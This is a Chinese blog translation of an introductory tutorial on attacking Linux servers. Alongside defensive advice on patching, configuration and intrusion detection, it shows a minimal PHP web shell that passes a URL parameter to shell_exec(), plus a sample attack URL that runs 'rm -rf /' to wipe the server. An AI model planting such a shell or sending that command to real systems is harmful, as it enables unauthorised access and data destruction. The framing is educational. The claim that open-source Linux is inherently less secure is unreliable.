首页 » 虚拟系统 » 如何攻击Linux操作系统:使用Ubuntu示例完成教程

如何攻击Linux操作系统:使用Ubuntu示例完成教程

谷歌已收录,更新于2019年06月15日; 如遇到问题,请留言及时通知站长; 欢迎加入 三生三世,讨论各种问题!

说明

Linux是使用最广泛的服务器操作系统,尤其适用于Web服务器。它是开源的; 这意味着任何人都可以访问源代码。与其他操作系统相比,这使其安全性降低,因为攻击者可以研究源代码来查找漏洞。Linux Hacking是利用这些漏洞来获取对系统的未授权访问。

在本文中,我们将向您介绍Linux是什么,它的安全漏洞以及您可以采取的应对措施。

关于Linux的快速说明

Linux是一个开源操作系统。有许多基于Linux的操作系统的发行版,如RedhatFedoraUbuntu等。与其他操作系统不同,Linux在安全性方面不太安全。这是因为源代码可以自由使用,因此与非开源的其他操作系统相比,很容易研究它的漏洞并利用它们。Linux可用作服务器,台式机,平板电脑或移动设备操作系统。

可以使用GUI或命令来操作Linux程序。与使用GUI相比,这些命令更有效,更高效。因此,了解Linux基本命令很有帮助。

有关如何开始使用Linux的信息,请参阅这些教程https://www.guru99.com/unix-linux-tutorial.html

Linux黑客工具

以上清单并非详尽无遗; 它让您了解可用于黑客Linux系统的工具。

如何防止Linux黑客攻击

Linux Hacking利用了操作系统中的漏洞。组织可以采用以下策略来保护自己免受此类攻击。

  • 补丁管理 - 修补程序修复了攻击者利用以破坏系统的错误。良好的补丁管理策略将确保您不断将相关补丁应用于您的系统。
  • 适当的操作系统配置 - 其他漏洞利用了服务器配置的弱点。应禁用非活动用户名和守护程序。应更改默认设置,例如应用程序的常用密码,默认用户名和某些端口号。
  • 入侵检测系统 - 此类工具可用于检测对系统的未授权访问。有些工具能够检测并防止此类攻击。

黑客活动:使用PHP破解Ubuntu Linux系统

在这个实际场景中,我们将为您提供有关如何使用PHP来破坏Linux的基本信息。我们不会针对任何受害者。如果您想尝试一下,可以在本地计算机上安装LAMPP

PHP附带了两个可用于执行Linux命令的函数。它有exec()shell_exec()函数。函数exec()返回命令输出的最后一行,而shell_exec()以字符串形式返回命令的整个结果。

出于演示目的,让我们假设攻击者管理员在Web服务器上上传以下文件。

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

这里,

上面的脚本从名为cmdGET变量中获取命令。该命令使用shell_exec()执行,并在浏览器中返回结果。

可以使用以下URL利用上述代码

http://localhost/cp/konsole.php?cmd=ls%20-l

这里,

  • ... konsole.php?cmd = ls%20-l 将值ls-l赋给变量cmd
    对服务器执行的命令将是
shell_exec('ls -l');

Web服务器上执行上述代码会产生类似于以下内容的结果。

黑客Linux操作系统破解:使用Ubuntu示例完成教程

上面的命令只显示当前目录中的文件和权限

假设攻击者通过以下命令

rm -rf /

*这里,8

  • rm删除文件
  • rf使rm命令以递归模式运行。删除所有文件夹和文件
  • /指示命令开始从根目录中删除文件

攻击URL看起来像这样

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

内容提要

  • Linux是服务器,台式机,平板电脑和移动设备的流行操作系统。
  • Linux是开源的,任何人都可以获得源代码。这样可以轻松发现漏洞。
  • 基本和网络命令对Linux黑客很有价值。
  • 漏洞是一个可以利用来破坏系统的弱点。
  • 良好的安全性可以帮助保护系统免受攻击者的攻击。

译文渠道

英文站:https://www.guru99.com/hacking-linux-systems.html
译者:黑冰技术站-枂下

一个只会魔改主题,而不会制作主题的站长,专业扒各种网站的各种样式。希望每一位来到这里的访客,都能拿到你们需要的资源!

发表评论

已有 4 条评论

  1. 1 1说道:

    一般不会动辄给人家来个缓冲溢出,补丁打好了,溢出个屌啊。而且也没啥技术含量,拿到shell,上传或下载或者直接打开vim黏贴攻击源码,不懂计算机的也可以干。

    绝大多数时候夺权,就是利用操作系统配置不合理,或者第三方软件或者插件漏洞,钻那种令人防不胜防的空子。这好歹还要点技术

  2. 小冷博客 小冷博客说道:

    大佬可怕 :oops: 不敢访问你网站了

    1. 枂下 枂下说道:

      没得写,翻译几篇外文 :cry:

      1. 小冷博客 小冷博客说道:

        参考别人写的文章 再写属于自己的内容也是可以的呀。只要能胜过原文就是好文章,很多大佬都不屑于详细的介绍,我就是看到一篇有趣的文章,然后搜索 找到这 将这些文章整合到一起 :eek:

返回主页看更多
赏杯咖啡给站长 支付宝 扫一扫